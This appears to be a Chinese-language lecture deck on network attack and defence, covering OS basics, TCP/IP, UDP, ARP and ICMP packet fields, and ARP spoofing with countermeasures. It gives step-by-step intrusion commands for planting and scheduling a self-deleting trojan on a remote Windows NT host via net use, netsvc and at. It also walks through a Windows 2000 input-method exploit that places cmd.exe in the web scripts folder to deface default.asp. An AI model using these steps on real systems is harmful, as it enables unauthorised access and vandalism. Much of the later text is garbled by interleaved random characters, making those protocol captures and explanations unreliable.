網(wǎng)絡(luò)攻擊與防御本節(jié)提要1.網(wǎng)絡(luò)安全概述2.一個(gè)網(wǎng)絡(luò)安全有關(guān)的案例3.與網(wǎng)絡(luò)安全有關(guān)的協(xié)議網(wǎng)絡(luò)安全概述網(wǎng)絡(luò)安全定義指網(wǎng)絡(luò)系統(tǒng)的硬件、軟件及系統(tǒng)中的數(shù)據(jù)受到保護(hù)，不會(huì)遭受惡意的破壞、更改和泄漏，系統(tǒng)可以正常的運(yùn)行網(wǎng)絡(luò)安全概述什么是不安全的網(wǎng)絡(luò)環(huán)境信息丟失信息戰(zhàn)內(nèi)部泄密外部泄密自然災(zāi)害、意外事故計(jì)算機(jī)犯罪網(wǎng)絡(luò)協(xié)議中的缺陷，例如TCP/IP協(xié)議的缺陷電子諜報(bào)，比如信息流量分析、信息竊取等人為行為，比如使用不當(dāng)，安全意識(shí)差等“黑客”行為，比如非法訪問(wèn)、非法連接一個(gè)關(guān)于網(wǎng)絡(luò)安全的實(shí)例一次迅速入侵NT架構(gòu)操作系統(tǒng)的方法操作系統(tǒng)平臺(tái)：必須為NT，可以是WINNT4.0或5.0；WorkStation或Server；還可以是WIN2000。

工具:Netsvc.exe

用于啟動(dòng)遠(yuǎn)程主機(jī)的schedule服務(wù)。

1.打開(kāi)DOS窗口，輸入netuse\\ip

連接上目標(biāo)主機(jī)。把木馬上傳到目標(biāo)主機(jī)。建議放在你共享的所在目錄，或系統(tǒng)目錄WINNT下,執(zhí)行時(shí)不用再輸入程序所在路徑。木馬都有自我刪除功能，所以一般不會(huì)被管理員發(fā)現(xiàn)。

上傳木馬后，鍵入:

C:/>netsvc\\ipschedule/start

啟動(dòng)目標(biāo)主機(jī)的schedule服務(wù)(schedule服務(wù)用來(lái)定時(shí)執(zhí)行某程序，我們可利用它來(lái)執(zhí)行木馬程序)。這過(guò)程可能會(huì)持續(xù)較久,一定要等到提示符出現(xiàn)才進(jìn)行下一步,然后鍵入

C:/>nettime\\ip

將顯示目標(biāo)主機(jī)的系統(tǒng)時(shí)間，如：14:43

記住這時(shí)間，接下來(lái)用AT命令往目標(biāo)主機(jī)添加入定時(shí)啟動(dòng)木馬程序的任務(wù)，鍵入：

C:/>at\\ip14:45trojan.exe

注意：這里我啟動(dòng)時(shí)間定為14:45而不是14:43，往后推遲了幾分鐘，這是考慮到命令往返于兩機(jī)需要一定的時(shí)間

至此，你只要等稍等幾分鐘過(guò)去，就可以打開(kāi)你的木馬客戶器控制目標(biāo)主機(jī)了，也不用那么麻煩地執(zhí)行程序啦！入侵分析這次入侵使用了一些DOS系統(tǒng)中的常用命令例如netuse\\ipC:/>netsvc\\ipschedule/start

C:/>nettime\\ip

C:/>at\\ip14:45trojan.exe使用了木馬程序Netsvc.exe學(xué)習(xí)網(wǎng)絡(luò)攻擊與防御我們需要哪些知識(shí)1.對(duì)操作系統(tǒng)的理解2.對(duì)網(wǎng)絡(luò)框架與協(xié)議的理解3.常用網(wǎng)絡(luò)命令的掌握4.掌握通過(guò)工具捕獲網(wǎng)絡(luò)信息的方法5.對(duì)捕獲的網(wǎng)絡(luò)信息有分析能力6.掌握路由器與交換機(jī)的工作原理與配置方法7.會(huì)設(shè)置防火墻操作系統(tǒng)介紹常用操作系統(tǒng)的架構(gòu)介紹一.基于windowsNT架構(gòu)系統(tǒng)Windows2000server系統(tǒng)特點(diǎn)：1.支持NTFS格式系統(tǒng)文件2.win2000系統(tǒng)支持127位的字符口令3.ActiveDirectory與Windows2000安全服務(wù)（如Kerberos身份驗(yàn)證協(xié)議、公鑰基本結(jié)構(gòu)、加密文件系統(tǒng)(EFS)、安全性配置管理器、組策略以及委派管理等）緊密集成。說(shuō)明1.什么是NTFS(NewTechnologyFileSystem)微軟Windows

NT內(nèi)核的系列操作系統(tǒng)支持的、一個(gè)特別為網(wǎng)絡(luò)和磁盤(pán)配額、文件加密等管理安全特性設(shè)計(jì)的磁盤(pán)格式。隨著以NT為內(nèi)核的Windows

2000/XP的普及，很多個(gè)人用戶開(kāi)始用到了NTFS。NTFS也是以簇為單位來(lái)存儲(chǔ)數(shù)據(jù)文件，但NTFS中簇的大小并不依賴于磁盤(pán)或分區(qū)的大小。簇尺寸的縮小不但降低了磁盤(pán)空間的浪費(fèi)，還減少了產(chǎn)生磁盤(pán)碎片的可能。NTFS支持文件加密管理功能，可為用戶提供更高層次的安全保證。

說(shuō)明ActiveDirectory是指Windows2000網(wǎng)絡(luò)中的目錄服務(wù)。它有兩個(gè)作用：1.目錄服務(wù)功能2.集中式管理該技術(shù)還可以用來(lái)確保只有那些經(jīng)過(guò)授權(quán)的用戶或應(yīng)用程序方可獲準(zhǔn)在具備安全保障的前提自下針對(duì)相關(guān)資源實(shí)施訪問(wèn)調(diào)用。

Unix系統(tǒng)架構(gòu)介紹UNIX，是一個(gè)強(qiáng)大的多用戶、多任務(wù)操作系統(tǒng)，支持多種處理器架構(gòu)unix是基于命令行的操作系統(tǒng)Unix操作系統(tǒng)通常被分成三個(gè)主要部分：內(nèi)核（Kernel）、Shell和文件系統(tǒng)。

Unix系統(tǒng)權(quán)限介紹1.讀許可權(quán)2.寫(xiě)許可權(quán)3.執(zhí)行許可權(quán)Unix基本命令操作舉例（1）首先讓我們?cè)诋?dāng)前目錄下創(chuàng)建兩個(gè)目錄dir1，dir2：

mkdirdir1dir2//輸入命令后記得敲一下回車(chē)鍵：

（2）進(jìn)入目錄dir1中創(chuàng)建文件file1，file2：

cddir1

//進(jìn)入目錄dir1

touchfile1file2//創(chuàng)建文件file1，file2（3）再進(jìn)入目錄dir2中創(chuàng)建文件file3，file4：

cd..

//返回上一級(jí)目錄

cddir2

//進(jìn)入目錄dir2

touchfile3file4

//創(chuàng)建文件file3，file4與DOS命令有些相似Unix常用操作界面網(wǎng)絡(luò)安全概述網(wǎng)絡(luò)安全定義指網(wǎng)絡(luò)系統(tǒng)的硬件、軟件及系統(tǒng)中的數(shù)據(jù)受到保護(hù)，不會(huì)遭受惡意的破壞、更改和泄漏，系統(tǒng)可以正常的運(yùn)行遠(yuǎn)程輕攻擊優(yōu)與防移御基錢(qián)礎(chǔ)介座紹Ho脖st箱C入侵鈔檢測(cè)鄰控制綁臺(tái)Ho次stBHo圣st貞A受保幕護(hù)網(wǎng)狐絡(luò)ID蔑S主機(jī)黑客發(fā)起擦攻擊驗(yàn)證裝報(bào)文躺并采編取措享施識(shí)別趁出攻活擊行梳為阻斷愈連接公或者脹報(bào)警朽等發(fā)現(xiàn)響應(yīng)策略In豈te狡rn停etIn轟te父rn臥et返回一次糕遠(yuǎn)程輛攻擊澆與防館御示禁意圖分析攻擊燦的位請(qǐng)置遠(yuǎn)程默攻擊本地負(fù)攻擊偽遠(yuǎn)意程攻犁擊簡(jiǎn)單著拒絕攝服務(wù)本地坊用戶退非法滋獲得疲權(quán)限遠(yuǎn)程晉用戶裝非法奮獲得五權(quán)限攻擊敵分類主動(dòng)呼攻擊被動(dòng)毯攻擊常見(jiàn)繪攻擊喂手段竊聽(tīng)炕（鍵廚擊記捷錄、此網(wǎng)絡(luò)惰監(jiān)聽(tīng)伏）欺騙柳（獲妙取口扭令、黃惡意顆代碼綁）拒絕尼服務(wù)游（資絨源耗疑盡）數(shù)據(jù)暮驅(qū)動(dòng)曬攻擊姿（緩意沖區(qū)盡溢出析、漏切洞攻沒(méi)擊）網(wǎng)絡(luò)直防御勇系統(tǒng)礙體系咳結(jié)構(gòu)預(yù)警保護(hù)檢測(cè)響應(yīng)恢復(fù)反擊網(wǎng)絡(luò)愧安全沃通信物協(xié)議總部分支賴機(jī)構(gòu)移動(dòng)菊用戶INTERNET安全賭整體父解決剩方案客戶留端防胞病毒拼與客忙戶端VP可N軟件入侵且檢測(cè)賽與服誰(shuí)務(wù)器割防病習(xí)毒防火君墻或VP嘩N網(wǎng)關(guān)網(wǎng)絡(luò)乓協(xié)議驅(qū)的進(jìn)博一步變討論Tc貢p/察Ip協(xié)議進(jìn)分析TC哥P協(xié)議仁報(bào)頭北格式分析通過(guò)多網(wǎng)絡(luò)喚分析拳儀捕骨獲的愿協(xié)議刪實(shí)例Tc虎p數(shù)據(jù)攔段如目下So書(shū)ur忍ce鹿p湯or翻t:慌59宏73塘//源端坦口De政st菠in召at從io梯n駱po朽rt賴:2種3圍/歸/目的心端口Se冒qu析en殲ce虜n壤um齊be旱r:稻14帆56險(xiǎn)38沸99慕07測(cè)/餅/序列改號(hào)Ac拳knu塑mb制er桃:1菠24弟20圣56合45絹6闖//確認(rèn)賴號(hào)Of條fs搞et迅:5鉗//報(bào)頭油長(zhǎng)度Re犧se標(biāo)rv掉ed清:冷%0餃00奪00江0琴//保留Co緞de畏:躁%0銳11喂00舅0鑰//代碼奸位Ac解kis觸v本al洗idPu蒼sh綱r棟eq跪ue戀stWi曠nd匆ow橡:兼61雖32機(jī)0琴/炸/窗口Ch伍ec設(shè)ks槍um幅:煎0x屯61飯a6賓/籃/校驗(yàn)醬和Ur握ge漁nt倘p適oi傲nt鹿er費(fèi):劃0識(shí)//緊急挺指針Notc法pop隙ti查on應(yīng)s攀//選項(xiàng)Tc狀pda爬ta藍(lán)a稼re貿(mào)a:雖/狡/數(shù)據(jù)Vl忙.5決.+標(biāo).5拔.+非.5離.播76相4煌c計(jì)19戀3諸5匆11趟2顯b臥19Fr棄am緣瑞e背ch陣ec文k妨se盲qu心en療ce具:0岸x0團(tuán)d0釘00貸0f網(wǎng)絡(luò)遇協(xié)議嫌的進(jìn)炮一步奇討論Tc源p/射Ip協(xié)議聰分析Ip協(xié)議棉報(bào)頭偵格式網(wǎng)絡(luò)望協(xié)議串的進(jìn)項(xiàng)一步捕討論分析申：版本洗：ip版本誘號(hào)首部嗚長(zhǎng)度銀：32位長(zhǎng)蘇度服務(wù)聽(tīng)類型纏：說(shuō)此明數(shù)藥據(jù)如驕何被庫(kù)處理長(zhǎng)度后：報(bào)滅頭與腰數(shù)據(jù)發(fā)的長(zhǎng)的度認(rèn)證妙：唯腸一的ip數(shù)據(jù)勾包值標(biāo)志顏：說(shuō)很明是肚否有吳數(shù)據(jù)忙被分茄片段偏文移量得：數(shù)演據(jù)在而裝入扮時(shí)太廈大，都需要西進(jìn)行裁分段疫與重嶼組TT賣(mài)L:是指慰一個(gè)語(yǔ)數(shù)據(jù)朽包被刪發(fā)送迎時(shí)規(guī)娛定的亮一個(gè)嘴時(shí)間見(jiàn)值協(xié)議鏈：上敏層協(xié)罰議端桂口，tc雷p是6H，UD每P是17授H校驗(yàn)開(kāi)和：建檢測(cè)棒報(bào)頭算的循勺環(huán)冗側(cè)余碼源地皺址：童發(fā)送白站的32位地田址目的任地址?。航优P收站找的32位地談址選項(xiàng)鬧：用珠于網(wǎng)僅絡(luò)調(diào)朋試，劈燕檢測(cè)通過(guò)動(dòng)網(wǎng)絡(luò)何分析速儀捕其獲的墻協(xié)議叼實(shí)例IP獄H娘ea供de住r攝-租In療te齊rn栽et愈P察ro陪to摸co滿l甚Da稀ta辰gr在amVe速rs邁io譜n:極4往/躲/版本漆號(hào)He羨ad臭er店L榆en突gt暮h:另5掏/段/首部貫長(zhǎng)度Pr芝ec倦ed涌en說(shuō)ce鵝:楊0待/碼/優(yōu)先洗級(jí)Ty泰pe杯o繡f勢(shì)Se傷rv烤ic該e:濕%嘴00探0服務(wù)桶類型Un梯us投ed與:甚%折00未使恰用To狗ta南l暖Le棋ng掏th固:燈18惹7總長(zhǎng)炎度Id拉en冒ti際fi近er咱:存22濾48呀6認(rèn)證Fr茫ag趙me練nt挑at棒io仍n但Fl反ag爭(zhēng)s:祖%首01嫂0圾Do氣N衫ot凡F停ra幟gm籍en摧t葛//是否康有分起片（到碎片蛾）Fr燒ag濱me惑nt軍O繞ff睡se暢t:積0稼//段開(kāi)輩銷(xiāo)Ti找me繭T館o蓮Li壯ve桶:蹦6希0嘉//生存瓣周期IP百T報(bào)yp裳e:由0殖x0乏6艷TC康P尼//協(xié)議章此蜻處表遲示6H隱T侵CPHe嗎ad撿erCh英ec汗ks伐em:券0x燙d0支31炮/禍/報(bào)頭現(xiàn)校驗(yàn)So冊(cè)u(píng)r堅(jiān)ce奇I青P泊Ad遠(yuǎn)dr益es南s:寶1怎0.屋7.無(wú)1.敞30De腔st.悟IP紅A步dd宮re蜂ss館:睡1段0.沃7.白1.紋10No貫I轎nt貧er霸ne易t偉Da窯ta籮gr甜am激O送pt天io跨ns喬/動(dòng)/無(wú)選兔項(xiàng)在ip協(xié)議真字段度可能尚出現(xiàn)得的協(xié)庫(kù)議號(hào)協(xié)議恨協(xié)議寸號(hào)IC橫MP炮1IG夢(mèng)RP概9EI介GR肺P獻(xiàn)88OS墻PF言89IP獄V6緒41GR膊E賴4飲7UD墓P協(xié)議網(wǎng)絡(luò)沙協(xié)議挑的進(jìn)悲一步迎討論源端晶口寶：幟發(fā)送譯數(shù)據(jù)臺(tái)主機(jī)診的端坊口號(hào)目的晨端口辨：譜目的定主機(jī)廊上請(qǐng)姑求應(yīng)勢(shì)用程悄序的蝕端口湊號(hào)長(zhǎng)度配：ud旨p報(bào)頭輛與ud懸p數(shù)據(jù)稻的長(zhǎng)劣度校驗(yàn)嚷和:報(bào)頭羊與數(shù)箱據(jù)字錦段兩民者的多校驗(yàn)渾和數(shù)據(jù)我：上邀層的城數(shù)據(jù)通過(guò)仇網(wǎng)絡(luò)榮分析僑儀捕戒獲的豈協(xié)議淋實(shí)例UD拾P軌-舟Us析er兔D丙at傳ag傻ra吵m酬P(guān)r家ot桶oc讀olSo表ur運(yùn)ce鑒P嬸or弱t:羞10數(shù)85這//源端研口De愈st梁in侍at走io踐n敢Po惰rt鋤:初51留36噸/糖/目的選端口Le悅ng誰(shuí)th保:慈41折//長(zhǎng)度Ch罪ec獻(xiàn)ks趕um伴:謠0x槍7a蔥3c蒙//校驗(yàn)UD蘿P口Da偵ta營(yíng)A女re具a:..珠Z.刮..好..酒..午..譯..憲..尸00促0趨1巖5a朗9鈔6距00船0弟1雁000000000011深0雜00000..叫.C故..首2.窩..臣._遍C.餅_C舅2守e刮03作0點(diǎn)0脈43盤(pán)0怠2吉1e戀3犁2償0a艘0懷0之0a跟0瓣0糖80競(jìng)4樂(lè)300抄8乏0Fr敘am阿e篇Ch兆ec批k痛Se帽qu粗en波ce壓:以0x肅00偏00超00喬00關(guān)于遭端口切的討厘論&傳輸技層的攪協(xié)議禮討論端口杏：tc租p與UD國(guó)P必須跪使用脆端口撈號(hào)來(lái)躺與其垮他上南層進(jìn)摧行通殖信不同卵的端差口號(hào)隔實(shí)現(xiàn)貧了不喜同的慕會(huì)話川過(guò)程在應(yīng)準(zhǔn)用層松中對(duì)甩應(yīng)的紀(jì)不同勻端口良號(hào)應(yīng)用搬層絲式傳輸夏層協(xié)窗議梅端口魯號(hào)FT憶P脆T抹CP躬2獻(xiàn)1TE閃LN柿ET壞T衫CP閑2污3DN秘S捆T栗CP照/U蛇DP累5互3TF敘TP公UD植P淺6種9PO首P3列UD竹P眨1燃10低于10電24的端稿口號(hào)鉤有rf臉c3王23榮2確定高于10懲24的端場(chǎng)口號(hào)唱及10愚24端口父號(hào)被碗上層紫用來(lái)淺建立米主機(jī)套與其味他主已機(jī)的悶會(huì)話傳輸知層上TC化P與UD捏P協(xié)議苦的比中較TC脈P關(guān)鍵糟字(排序回、可屑靠、雪面向量連接洗、虛恰電路刑、三元方握反手、遠(yuǎn)窗口牧流量睬控制)、UD辜P關(guān)鍵謙字(無(wú)序狹、不啊可靠蹤蝶、無(wú)本連接夜、低輸開(kāi)銷(xiāo)架、無(wú)裹確認(rèn)覆、沒(méi)瞇有窗拔口或丙流量劉控制)一次焦利用戶端口干與wi紹nd隱ow萄s2辯00贏0漏洞輕進(jìn)行戶攻擊攀的實(shí)云例攻擊果目的述：侵武入安露裝wi攔nd或ow羊s2唱00勻0網(wǎng)絡(luò)架服務(wù)韻器的殺主機(jī)首，獲劉得網(wǎng)筐站資質(zhì)料并垃篡改畜網(wǎng)頁(yè)壘內(nèi)容攻擊界步驟君：利列用WI播ND弓OW輸入誰(shuí)法漏香洞1、用退端口對(duì)掃瞄活程序釣掃IP的33限89端口供，得腥到xx服.x熊x.姿xx執(zhí).x孩x。2、運(yùn)奶行wi蓋nd眠ow斧s2押00普0終端旺客戶愁程序費(fèi)，在鋒服務(wù)講器輸牙入框鋤里填液入：xx浩.x蓋x.畢xx臣.x負(fù)x，連敲接。3、出繡現(xiàn)wi日nd注ow沖s2惡00才0的登破陸窗擴(kuò)口，播按下CT百RL反+S牙HI諷FT鍵，才出現(xiàn)虎全拼薪輸入潔法。一次宏利用赴端口宮與wi倚nd臟ow考s2持00保0漏洞販進(jìn)行鐮攻擊李的實(shí)芹例4、在啦輸入濤法狀申態(tài)條駝上按mo威us胖e右鍵寧，選奪擇幫莊助，尾選擇蒸輸入蒜指南見(jiàn)，選歌擇"選項(xiàng)"按右私鍵。5、選念擇"跳轉(zhuǎn)水到UR溜L(fēng)"，輸殘入：c:瞞\w駱in責(zé)nt墳\s促ys左te立m3越2\脖cm垮d.鋒ex高e.6、選府擇"保存鍵到磁鋼盤(pán)"。7、選滿擇目柔錄：c:含\i設(shè)ne慕tp旦ub收\(chéng)s曬cr免ip寬ts\8、打館開(kāi)IE，輸倍入：xx哥.x浪x.惡xx泳.x拾x/搶sc村ri舌pt調(diào)s/箏cm孝d.患ex體e?急/c社+d浙ir礙+c:\（知秧道了佳吧）9、輸磚入：xx立.x接x.傳xx黑.x穿x/捆sc泳ri糾pt黎s/表cm愈d.睛ex販e?烤/c靠+e舅ch擁o+炭BE謊IJ鄉(xiāng)豐IN勞G+>c:混\i陰ne閉tp即ub獄\w滋ww于ro狂ot拴\d皇ef哥au沾lt應(yīng).a顏spAR接P協(xié)議輛與RA當(dāng)RP協(xié)議拍的進(jìn)敵一步戰(zhàn)討論地址甲解析貧協(xié)議AR至P概述圖例拿：通過(guò)食網(wǎng)絡(luò)體分析坦儀捕大獲的婚協(xié)議躍實(shí)例Pa化ck攔et故L主en配gt霉h:異64Ti喊me伍st斷am普p:越09蝦:1治7:核29生03遇/1襯7/牽10Et圾he浮rn蜜et粥H地ea姓de同rDe鄭st例in死at繭io單n:群F框F:古FF展:F瓦F:蒼FF毯:F壇F:稿FF抱//這是畏一個(gè)蹈廣播籃地址So叢ur交ce勤:枕00坊:A本0:墊24鄭:4紗8:屈60雅:A弓5Pr稱ot響oc墻ol族T授yp北e:哄0x牙08樣06調(diào)I拆P捧AR獸PAR秘P互-騰Ad匯dr滋es趣s傅Re認(rèn)so程lu烏ti膠on位P旋ro釀to丹co慎lHa據(jù)rd蛙wa謎re蔑:丙1恥E捉th跪er秒ne其t攻(1紹0M和b)Pr古ot到oc迎ol辛:閉0沿x0芽80票0毯IPHa伴rd最wa晃re兩A釋dd艙re券ss難L恥en始gt是h:糧6Pr銅ot篇oc濱ol撫A惱dd抹re守ss脫L倍en膜gt且h:別4Op妥er謠at類io近n:浩1梁A暈RP歸R兆eq蝴ue冰stSe小nd巧er節(jié)H廉a(chǎn)r械dw敏ar狐e敵Ad悔dr臥es兼s:鉤0伍0:糖A0秋:2割4:怒48畫(huà):6屬0:松A5Se摟nd冤er讀I象nt虎er然ne其t迷Ad茶dr晃es挖s:籍1承72捐.1奪6.清10嚇.3Ta皂rg尊et文H遙ar選dw榮ar忽e煮Ad思dr昆es己s:昂0倘0:衡00喚:0豪0:茂00道:0來(lái)0:老00慚(輩ig癥no寧re低d)Ta羊rg負(fù)et蓮I炊nt晃er獎(jiǎng)ne公t織Ad救dr晝es偵s:安1婦72取.1哨6.訓(xùn)10懲.1磚0AR澇P就是勺已知假主機(jī)多的IP地址乞在網(wǎng)邪絡(luò)上屑查找初到它館的MA兩C地址械的協(xié)或議一次楚利用AR賭P協(xié)議冤的攻賤擊AR租P欺騙皇原理每臺(tái)偽安裝犯有TC雹P/該IP協(xié)議叔的電浸腦里彼都有皆一個(gè)AR擋P緩存臘表，兵表里喚的IP地址凍與MA傭C地址忽是一勸一對(duì)祥應(yīng)的被，如飄下表乎所示火。主機(jī)IP地址MA谷C地址A晌19針2.嫩16患8.貧16綢.1aa頁(yè)-a魚(yú)a-沖aa亞-a父a-薯aa穴-a勞aB宮19崖2.播16踏8.意16腿.2析b訪b-劃bb盈-b忘b-慌bb響-b姜b-矛bbC貌19館2.聯(lián)16雹8.課16底.3搞c穩(wěn)c-它c(diǎn)c剪-c趨c-摩cc忠-c濾c-步ccD橡19闊2.相16鎮(zhèn)8.水16愚.4dd抓-d懇d-企dd竟-d極d-復(fù)dd泄-d趨d一次型利用AR非P協(xié)議析的攻鳳擊AR共P協(xié)議暑的基芬礎(chǔ)就播是信孕任局浮域網(wǎng)駛內(nèi)所買(mǎi)有的果人，碎那么圈就很瘋?cè)菀讔鋵?shí)現(xiàn)龍?jiān)谝哉W(wǎng)北上的AR訊P欺騙迷。對(duì)攏目標(biāo)A進(jìn)行穗欺騙橋，A去Pi玻ng主機(jī)C卻發(fā)葡送到鼻了DD嶺-D鉆D-只D找D-妄DD產(chǎn)-D貞D-暗DD這個(gè)蘋(píng)地址箏上。強(qiáng)如果鼻進(jìn)行如欺騙滋的時(shí)草候，殲把C的MA疤C地址激騙為DD那-D菌D-怎DD狂-D塘D-戰(zhàn)DD恥-D扶D，于茂是A發(fā)送矛到C上的撇數(shù)據(jù)指包都旦變成暴發(fā)送舌給D的了主。這慕不正能好是D能夠謹(jǐn)接收坦到A發(fā)送恰的數(shù)脾據(jù)包斷了么燭。如何儉防范AR色P攻擊AR轎P攻擊梯后的惜癥狀A(yù)R撇P的發(fā)降現(xiàn)：AR尖P的通辟病就耕是掉肢線，啦在掉濱線的劍基礎(chǔ)敏上可必以通過(guò)過(guò)以鼻下幾鉤種方藝式判愉別無(wú)，1.一般森情況造下不佩需要潮處理1分鐘耳之內(nèi)旗就可宇以回吳復(fù)正糕常上壁網(wǎng)。狀因?yàn)锳R凝P欺騙葡是由底時(shí)限待，過(guò)凈了期嬌限就網(wǎng)會(huì)自腦動(dòng)的杯回復(fù)盟正常爆。而悄且現(xiàn)憲在大胸多數(shù)飾路由萄器都嶼會(huì)在草很短噴時(shí)間經(jīng)內(nèi)鞏不停尼廣播超自己連的正介確AR厭P，使梯受騙據(jù)的機(jī)姑器回益復(fù)正管常。丑但是姥如果鍋出現(xiàn)守攻擊程性AR瓣P(guān)欺騙冷（其俱實(shí)就煙是時(shí)熟間很科短的諸量很角大的未欺騙AR奔P，1秒有梳個(gè)幾雅百上搭千的鵲），唱他是賊不速斷的問(wèn)通過(guò)口非常白大量AR宰P欺騙胸來(lái)阻華止內(nèi)偽網(wǎng)機(jī)騎器上虜網(wǎng)，預(yù)即使餓路由腦器不閉斷廣登播正傻確的斯包也擋會(huì)被杠他大律量的擴(kuò)錯(cuò)誤暢信息峽給淹唯沒(méi)。2.打開(kāi)蜓被騙諒機(jī)器辮的DO熄S界面侄，輸螞入AR薪P潔-A命令趣會(huì)看驗(yàn)到相掛關(guān)的AR責(zé)P表，諒?fù)ㄟ^(guò)籠看到組的網(wǎng)各關(guān)的MA伏C地址委可以滾去判猛別是差否出街現(xiàn)AR鏡P欺騙瘦，但坐是由也于時(shí)勝限性葉，這暖個(gè)工秤作必項(xiàng)須在普機(jī)器蜜回復(fù)酒正常祝之前邁完成塔。如鞠果出辟現(xiàn)賢欺騙母問(wèn)題案，AR修P表里錄面會(huì)轉(zhuǎn)出現(xiàn)宵錯(cuò)誤河的網(wǎng)巖關(guān)MA寨C地址務(wù)，和仗真實(shí)師的網(wǎng)客關(guān)MA糟C進(jìn)行伸對(duì)比如何削防范AR廊P攻擊1.在PC上綁貴定路川由器遣的IP和MA母C地址女：1)首先抽，獲涌得路袍由器嘗的內(nèi)勝網(wǎng)的MA獨(dú)C地址(例如Hi宗PE隸R網(wǎng)關(guān)鑄地址19桂2.抬16跨8.開(kāi)16蝦.2鏡54的MA縣C地址盒為00祖22喪aa勉00垮22贊aa局域估網(wǎng)虹端口MA筆C地址>)。2)編寫(xiě)廈一個(gè)茅批處先理文切件ra淹rp橡.b朋at內(nèi)容堂如下紗：@e肚ch邁o饅of舟far群p-dar歪p-s航1賽92獄.1鳴68是.1畫(huà)6.沖25嶺4釣00騙-2扭2-姻aa屠-0尸0-素22苗-a吊a將文優(yōu)件中貴的網(wǎng)罷關(guān)IP地址賓和MA土C地址恒更改按為您斧自己繁的網(wǎng)報(bào)關(guān)IP地址升和MA哭C地址包即可擠。將這育個(gè)批礦處理傳軟件妨拖到煮“wi郊nd澤ow在s-賄-開(kāi)始--程序--啟動(dòng)容”中揀。2.在路四由器霧上綁語(yǔ)定用虛戶主土機(jī)的IP和MA鑰C地址(4靠40以后由的路酬由器哄軟件釣版本褲支持)IC治MP協(xié)議沸的討快論該協(xié)歐議工夾作在礎(chǔ)網(wǎng)絡(luò)煮層屬于咬一個(gè)童管理悟型協(xié)往議ic音mp（因期特網(wǎng)狗控制蝴報(bào)文追協(xié)議桃）協(xié)禿議負(fù)泡責(zé)為IP提供墾路由閃信息仗與有叨無(wú)差繼錯(cuò)情剝況典型錘應(yīng)用pi券ng該協(xié)余議使團(tuán)用ip協(xié)議雹進(jìn)行宅封裝通過(guò)警網(wǎng)絡(luò)蜓分析臣儀捕媽獲的罩協(xié)議趨實(shí)例捕獲柔完整遲的協(xié)沈議數(shù)宏據(jù)內(nèi)擠容Fl今ag掏s:蜻0倆x0俗0St珍at憲us凝:娛0版x0票0Pa劃ck個(gè)et敗L暢en組gt緒h:廢7孔8Ti杰me牙st切am撓p:徐1喂4:梯04文:2敲5.譯96洞70笑00押1察2/歉20單/0顛3Et限he牧rn草et菜H鉛ea幕de靈rDe繩st榨in嫂at弄io午n:果0袍0:形a0市:2抄4:坦6e火:0剝f:道a8So浴ur你ce瞎:匆0伙0:崇80拿:c蜻7:促a8勢(shì):f招0:婚3dEt梨he秒r-炮Ty姓pe拆:木0其8-裹00管I域P通過(guò)蟲(chóng)網(wǎng)絡(luò)宿分析斤儀捕閉獲的撐協(xié)議潔實(shí)例IP用H列ea繼de次r凈-橡In槐te敲rn圖et蛇P碧ro短to框co森lDa溉tg勻ra倚mVe襯rs租io銷(xiāo)n:校4He膊ad扣er渠L毫en縱gt唐h:蕉5Pr拼ec址ed嶄en施ce廟:畢0Ty澡pe競(jìng)o壟f蓄Se倡rv谷ic塌e:甜%索00蠶0Un店us效ed努:悶%葛00To止ta脈l摸Le張ng睡th柏:跨6苦0Id摘en五ti徐fi咬er績(jī):餡